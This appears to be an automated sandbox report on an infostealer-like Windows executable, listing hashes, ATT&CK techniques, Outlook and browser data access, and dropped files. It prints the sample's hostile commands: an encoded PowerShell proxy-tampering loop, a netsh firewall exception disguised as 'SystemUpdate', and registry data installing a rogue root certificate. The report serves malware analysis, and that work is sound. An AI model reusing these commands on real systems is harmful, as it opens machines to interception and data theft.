d471be2737c03a4adc00e5cec0e55a785ae718429f5d946a296c899bafa2c83d

General

Target

140000000.filehistory.exe
Size

435KB
MD5

d1a29ae7e04374c4dd68058e51c7d55d
SHA1

23c3e319b1b301b00e52f950df00a9aa056f6cfd
SHA256

d471be2737c03a4adc00e5cec0e55a785ae718429f5d946a296c899bafa2c83d
SHA512

32ee15a2cbc897504efd45ba6d6e11355c069333ed31d0513957e2bad80ef8982f6c19e321cafc657c37b758d2b6735d6b5bdb26665cbbf34d266b65b7a88b87
SSDEEP

12288:US/t30aR8Ot+MVYH9mJ8fxsZTPM8VzT121n:L/lj9a+B

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
38	4368	powershell.exe

Modifies Windows Firewall 1 TTPs 1 IoCs

evasion

Modify Existing Service

T1031

pid	Process
2608	netsh.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	140000000.filehistory.exe
Key opened	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	140000000.filehistory.exe
Key opened	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	140000000.filehistory.exe

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
21	checkip.dyndns.org
28	ipinfo.io

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	140000000.filehistory.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	140000000.filehistory.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\MY\Certificates\C42F90BB0551A130BD32DB4F8ECB054EA10F397E\Blob = 14000000010000001400000007b3f86b7bff1ac085536ecef62f23521be2473f0b000000010000001e0000004f005600200056006500720069005300690067006e0020004300410000000200000001000000a40000001c00000044000000010000000000000000000000000000000100000043004e003d004f005600200056006500720069005300690067006e002000430041000000000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000c42f90bb0551a130bd32db4f8ecb054ea10f397e2000000001000000e0020000308202dc308201c4a003020102020811a21efef65b34b0300d06092a864886f70d01010b050030193117301506035504030c0e4f5620566572695369676e204341301e170d3232303530313232343031325a170d3235303830343232343031325a30193117301506035504030c0e4f5620566572695369676e20434130820122300d06092a864886f70d01010105000382010f003082010a02820101009b6974ef1a52cf627abff70cca5586ebe7f8e2df52891b057aa24cf0838e4d10fcfcbb9ec3dba60f437324225511f10a8e6c1eac33e9853a38dd539f9b7bb6beea154b4fb9089530ca798826d861b5d7d9aaccf24fbc35ab2311747be5f94e09f69c8330ff21fea36d24eb638439fe8130ecc001a5934691bbcdae7af2d46ed7847fb057b0da3695ae9c39dfbc45ae5a2badfb73024566788bb62e972e518a3eac7628bab14b6f72fdabc3b8cf7b7a356f776d2d400c43c2cd9e87f58ab9fd1ba07186b700d2aef6692064d68dcda052986af9a2fc4989ca394debb2452f97664e21bfeea9420bf5175429e0644877ab20f428e6188e98bba49137a8d56900b90203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010062d61d430fb38f5be1676b9ee0ca2dc552a43b9d93bbd63790939760736b907908a8007f4815ebcb2e349e143ec32cbd5336fe86a80f1a307d6e7d963b9e8c34668f54df0c6da3612f28acb64ca5dba230ed07e2bfaf0731c29848067d7e592b3be318d52f992b5b6980c29304010754b4112b6a30ce869644072912ddd1adefe896244739f90c2a27394655662211c27b2ec85534e97df627b9d7cd9789ebe95d16f657566da3bc358585f642d55a8b209d4e01bd4dd11786d6e7743e7a35ddb35c1d3083f055b3e14fe1e2c7d5ad78be59ab478183f34973b180e0784bda8f0bf746d1d0dd9558ec43b2b08795c626e51c218a8a7bd45839a5c4aa28127f4a	140000000.filehistory.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\C42F90BB0551A130BD32DB4F8ECB054EA10F397E	140000000.filehistory.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\C42F90BB0551A130BD32DB4F8ECB054EA10F397E\Blob = 030000000100000014000000c42f90bb0551a130bd32db4f8ecb054ea10f397e0200000001000000a40000001c00000044000000010000000000000000000000000000000100000043004e003d004f005600200056006500720069005300690067006e002000430041000000000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e003000000000000b000000010000001e0000004f005600200056006500720069005300690067006e0020004300410000002000000001000000e0020000308202dc308201c4a003020102020811a21efef65b34b0300d06092a864886f70d01010b050030193117301506035504030c0e4f5620566572695369676e204341301e170d3232303530313232343031325a170d3235303830343232343031325a30193117301506035504030c0e4f5620566572695369676e20434130820122300d06092a864886f70d01010105000382010f003082010a02820101009b6974ef1a52cf627abff70cca5586ebe7f8e2df52891b057aa24cf0838e4d10fcfcbb9ec3dba60f437324225511f10a8e6c1eac33e9853a38dd539f9b7bb6beea154b4fb9089530ca798826d861b5d7d9aaccf24fbc35ab2311747be5f94e09f69c8330ff21fea36d24eb638439fe8130ecc001a5934691bbcdae7af2d46ed7847fb057b0da3695ae9c39dfbc45ae5a2badfb73024566788bb62e972e518a3eac7628bab14b6f72fdabc3b8cf7b7a356f776d2d400c43c2cd9e87f58ab9fd1ba07186b700d2aef6692064d68dcda052986af9a2fc4989ca394debb2452f97664e21bfeea9420bf5175429e0644877ab20f428e6188e98bba49137a8d56900b90203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010062d61d430fb38f5be1676b9ee0ca2dc552a43b9d93bbd63790939760736b907908a8007f4815ebcb2e349e143ec32cbd5336fe86a80f1a307d6e7d963b9e8c34668f54df0c6da3612f28acb64ca5dba230ed07e2bfaf0731c29848067d7e592b3be318d52f992b5b6980c29304010754b4112b6a30ce869644072912ddd1adefe896244739f90c2a27394655662211c27b2ec85534e97df627b9d7cd9789ebe95d16f657566da3bc358585f642d55a8b209d4e01bd4dd11786d6e7743e7a35ddb35c1d3083f055b3e14fe1e2c7d5ad78be59ab478183f34973b180e0784bda8f0bf746d1d0dd9558ec43b2b08795c626e51c218a8a7bd45839a5c4aa28127f4a	140000000.filehistory.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\MY\Certificates\C42F90BB0551A130BD32DB4F8ECB054EA10F397E	140000000.filehistory.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\MY\Certificates\C42F90BB0551A130BD32DB4F8ECB054EA10F397E\Blob = 030000000100000014000000c42f90bb0551a130bd32db4f8ecb054ea10f397e0200000001000000a40000001c00000044000000010000000000000000000000000000000100000043004e003d004f005600200056006500720069005300690067006e002000430041000000000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e003000000000000b000000010000001e0000004f005600200056006500720069005300690067006e0020004300410000002000000001000000e0020000308202dc308201c4a003020102020811a21efef65b34b0300d06092a864886f70d01010b050030193117301506035504030c0e4f5620566572695369676e204341301e170d3232303530313232343031325a170d3235303830343232343031325a30193117301506035504030c0e4f5620566572695369676e20434130820122300d06092a864886f70d01010105000382010f003082010a02820101009b6974ef1a52cf627abff70cca5586ebe7f8e2df52891b057aa24cf0838e4d10fcfcbb9ec3dba60f437324225511f10a8e6c1eac33e9853a38dd539f9b7bb6beea154b4fb9089530ca798826d861b5d7d9aaccf24fbc35ab2311747be5f94e09f69c8330ff21fea36d24eb638439fe8130ecc001a5934691bbcdae7af2d46ed7847fb057b0da3695ae9c39dfbc45ae5a2badfb73024566788bb62e972e518a3eac7628bab14b6f72fdabc3b8cf7b7a356f776d2d400c43c2cd9e87f58ab9fd1ba07186b700d2aef6692064d68dcda052986af9a2fc4989ca394debb2452f97664e21bfeea9420bf5175429e0644877ab20f428e6188e98bba49137a8d56900b90203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010062d61d430fb38f5be1676b9ee0ca2dc552a43b9d93bbd63790939760736b907908a8007f4815ebcb2e349e143ec32cbd5336fe86a80f1a307d6e7d963b9e8c34668f54df0c6da3612f28acb64ca5dba230ed07e2bfaf0731c29848067d7e592b3be318d52f992b5b6980c29304010754b4112b6a30ce869644072912ddd1adefe896244739f90c2a27394655662211c27b2ec85534e97df627b9d7cd9789ebe95d16f657566da3bc358585f642d55a8b209d4e01bd4dd11786d6e7743e7a35ddb35c1d3083f055b3e14fe1e2c7d5ad78be59ab478183f34973b180e0784bda8f0bf746d1d0dd9558ec43b2b08795c626e51c218a8a7bd45839a5c4aa28127f4a	140000000.filehistory.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
4572	140000000.filehistory.exe

Suspicious behavior: EnumeratesProcesses 28 IoCs

pid	Process
4572	140000000.filehistory.exe
4368	powershell.exe
4368	powershell.exe
4572	140000000.filehistory.exe
4572	140000000.filehistory.exe
4572	140000000.filehistory.exe
4572	140000000.filehistory.exe
4572	140000000.filehistory.exe
4572	140000000.filehistory.exe
4572	140000000.filehistory.exe
4572	140000000.filehistory.exe
4572	140000000.filehistory.exe
4572	140000000.filehistory.exe
4572	140000000.filehistory.exe
4572	140000000.filehistory.exe
4572	140000000.filehistory.exe
4572	140000000.filehistory.exe
4572	140000000.filehistory.exe
4572	140000000.filehistory.exe
4572	140000000.filehistory.exe
4572	140000000.filehistory.exe
4572	140000000.filehistory.exe
4572	140000000.filehistory.exe
4572	140000000.filehistory.exe
4572	140000000.filehistory.exe
4572	140000000.filehistory.exe
4572	140000000.filehistory.exe
4572	140000000.filehistory.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	4572	140000000.filehistory.exe
Token: SeDebugPrivilege	4368	powershell.exe

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 4572 wrote to memory of 2608	4572	140000000.filehistory.exe	91
PID 4572 wrote to memory of 2608	4572	140000000.filehistory.exe	91
PID 4572 wrote to memory of 4368	4572	140000000.filehistory.exe	90
PID 4572 wrote to memory of 4368	4572	140000000.filehistory.exe	90

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	140000000.filehistory.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	140000000.filehistory.exe

C:\Users\Admin\AppData\Local\Temp\140000000.filehistory.exe
"C:\Users\Admin\AppData\Local\Temp\140000000.filehistory.exe"
1⤵
- Accesses Microsoft Outlook profiles
- Checks processor information in registry
- Modifies system certificate store
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- outlook_office_path
- outlook_win_path
PID:4572
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -enc dwBoAGkAbABlACgAJAB0AHIAdQBlACkAewAKAHQAcgB5AHsAaQB3AHIAIAAnAGgAdAB0AHAAcwA6AC8ALwBlAHgAYQBtAHAAbABlAC4AYwBvAG0AJwAgAC0AdQBzAGUAYgBhAHMAaQBjAHAAYQByAHMAaQBuAGcAfQBjAGEAdABjAGgAewAKACQAcgBlAGcASwBlAHkAPQAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAEkAbgB0AGUAcgBuAGUAdAAgAFMAZQB0AHQAaQBuAGcAcwAiADsAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AcABhAHQAaAAgACQAcgBlAGcASwBlAHkAIABQAHIAbwB4AHkARQBuAGEAYgBsAGUAIAAtAHYAYQBsAHUAZQAgADAAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAdABvAHAAIAA7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAHAAYQB0AGgAIAAkAHIAZQBnAEsAZQB5ACAAUAByAG8AeAB5AFMAZQByAHYAZQByACAALQB2AGEAbAB1AGUAIAAiACIAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAdABvAHAAOwAgAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAHAAYQB0AGgAIAAkAHIAZQBnAEsAZQB5ACAAQQB1AHQAbwBDAG8AbgBmAGkAZwBVAFIATAAgAC0AVgBhAGwAdQBlACAAIgAiACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAHQAbwBwADsAZQB4AGkAdAAKAH0ACgBzAGwAZQBlAHAAIAAyAH0A
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4368
- C:\Windows\SYSTEM32\netsh.exe
  "netsh.exe" firewall add allowedprogram C:\Users\Admin\AppData\Local\Temp\140000000.filehistory.exe SystemUpdate ENABLE
  2⤵
  - Modifies Windows Firewall
  PID:2608

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Privilege Escalation

Defense Evasion

Install Root Certificate

Modify Registry

Credential Access

Credentials in Files

1

T1081

Discovery

Query Registry

1

T1012

System Information Discovery

1

T1082

Lateral Movement

Collection

Data from Local System

Email Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Tmp63CC.tmp

Filesize
2KB

MD5
6e9c7f3b5bc73ab756ae33f1ad3a9e39

SHA1
64a9f4b51cc5d459840c72b5c4c28bcd73a895eb

SHA256
aa869d7e6c5344c9fb416dfd05546cbe6adf0a7f6f74b570bb3b36c65ac497a2

SHA512
d7c16130de17cb68c9ccd16367cb0f86297e425422981937c3e75c23cc972c70a376a60dcafc9ac8e478fd7f94e3e67bed1d424cc6e5e7337e794569ceb42fd4

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tmp7119.tmp

Filesize
2KB

MD5
aa9e44be7b0d1722f3883d09312cb071

SHA1
54b5e59cf322ef68cccc39d8000b78df7a19dcf3

SHA256
9aab2889612ff61b18c973354d7f2b5ddc2a6d8238a041720929f1d914c76e46

SHA512
9cf29437480746ffcdca7fd529dc55260fdbb40a5dc9e64c9297267ee7d588412c563bd6083ceb04eee44448a7b14adaa486be2d8e004cb7523628caa34d05e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tmp8426.tmp

Filesize
2KB

MD5
c6ede32087937b2bbc16f41a14c1bd0e

SHA1
990797014efe1d1b22e74644e0267d079d4bc575

SHA256
49e3759832fede5acb8d3cfe71e09575408ff18c84ddb9bb69aee635efa16c50

SHA512
9eed3809df8915299341ae27a34aadf0d2216de6d4ea2be7857353e8cfa07677e6b1b28d772a3128957f8120ab4cb5704004ced47ffe2fc67c8a73f89a4efcd4

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpBFF8.tmp

Filesize
2KB

MD5
4b8ef5f82ff2ada394d57d24aec4a2b6

SHA1
36c67a815ffeeed5fc80e6abe503bfd191435630

SHA256
739142a343f8fb9753750b4eb6bc28c37c52dbe6e41a308132b893e55e4cf4f7

SHA512
f016ed958caff894fb35d9c9e35bf09c92714b8fa7f6c1b842e75feb32e8f7effa1cb7c809565bf5d0f9e8b7b4e1bc51f4e3a18298bbdf89a02e3d046e9e7d39

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_b4vrrwgt.yck.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\C42F90BB0551A130BD32DB4F8ECB054EA10F397E

Filesize
1KB

MD5
235229583474c8d0013744049f27e0be

SHA1
2b2f8623109ed6fa0209661dd1af388e006850d3

SHA256
cc135a01d0c3df89c34fcf1273f539ac7e8451604158b47752605a33fb00bff4

SHA512
ecf0e9a4e3b5280ba91b08abede9ab90a7130bedc39aad7c5ad8f74b743a68d9339ee3705fada9c5577b5e20bf2fe297f984dd9344c166255211742023e10257

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\C42F90BB0551A130BD32DB4F8ECB054EA10F397E

Filesize
1KB

MD5
103970df80b619dc19d8df4a09fb73e8

SHA1
9014c4ae0c3d041276bef14c2742aacb5ef147ae

SHA256
680db32a0a60589e3b9210d825c20adc2ca5f4af5be95d8f055f945e3e6d42ff

SHA512
c97d7fa691aa474c06a64f3e1be74be537463d9e9bed8560039bec9e57a5845048264aa9fb5d70fcdc26755f0c8b79617c83d150926421260584890bd4ba9b78

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\07B3F86B7BFF1AC085536ECEF62F23521BE2473F

Filesize
208B

MD5
e867d16ad2fcb29e08317c90f8f96808

SHA1
a65c18531bf727db8d3b5203471802b0b57a1071

SHA256
05d6fc2288a32dfe1e3fb56f486b2a18af50e50db5b6b45e2b72ba2570782772

SHA512
bd738402a4166a3b1bc75115c01bae85ed35d05c5219987f3d562e3ea5980b4be4e0ae725225b3ac1be527b3eacf8eccf07010b684ff17f755ad4e8051ece466

Download Submit
memory/4368-208-0x000001E7D8F20000-0x000001E7D8F30000-memory.dmp

Filesize
64KB

Download
memory/4368-209-0x000001E7D8F20000-0x000001E7D8F30000-memory.dmp

Filesize
64KB

Download
memory/4368-210-0x000001E7D8F20000-0x000001E7D8F30000-memory.dmp

Filesize
64KB

Download
memory/4368-162-0x000001E7D8F20000-0x000001E7D8F30000-memory.dmp

Filesize
64KB

Download
memory/4368-163-0x000001E7D8F20000-0x000001E7D8F30000-memory.dmp

Filesize
64KB

Download
memory/4368-164-0x000001E7D8F20000-0x000001E7D8F30000-memory.dmp

Filesize
64KB

Download
memory/4572-148-0x000002A84C520000-0x000002A84C535000-memory.dmp

Filesize
84KB

Download
memory/4572-150-0x000002A8661D0000-0x000002A866246000-memory.dmp

Filesize
472KB

Download
memory/4572-147-0x000002A868840000-0x000002A868850000-memory.dmp

Filesize
64KB

Download
memory/4572-146-0x000002A84DE00000-0x000002A84DE21000-memory.dmp

Filesize
132KB

Download
memory/4572-133-0x000002A84C120000-0x000002A84C192000-memory.dmp

Filesize
456KB

Download
memory/4572-149-0x000002A866100000-0x000002A86614A000-memory.dmp

Filesize
296KB

Download
memory/4572-151-0x000002A866170000-0x000002A86618E000-memory.dmp

Filesize
120KB

Download
memory/4572-145-0x000002A84DE00000-0x000002A84DE21000-memory.dmp

Filesize
132KB

Download
memory/4572-144-0x000002A868840000-0x000002A868850000-memory.dmp

Filesize
64KB

Download
memory/4572-143-0x000002A84DD70000-0x000002A84DD92000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing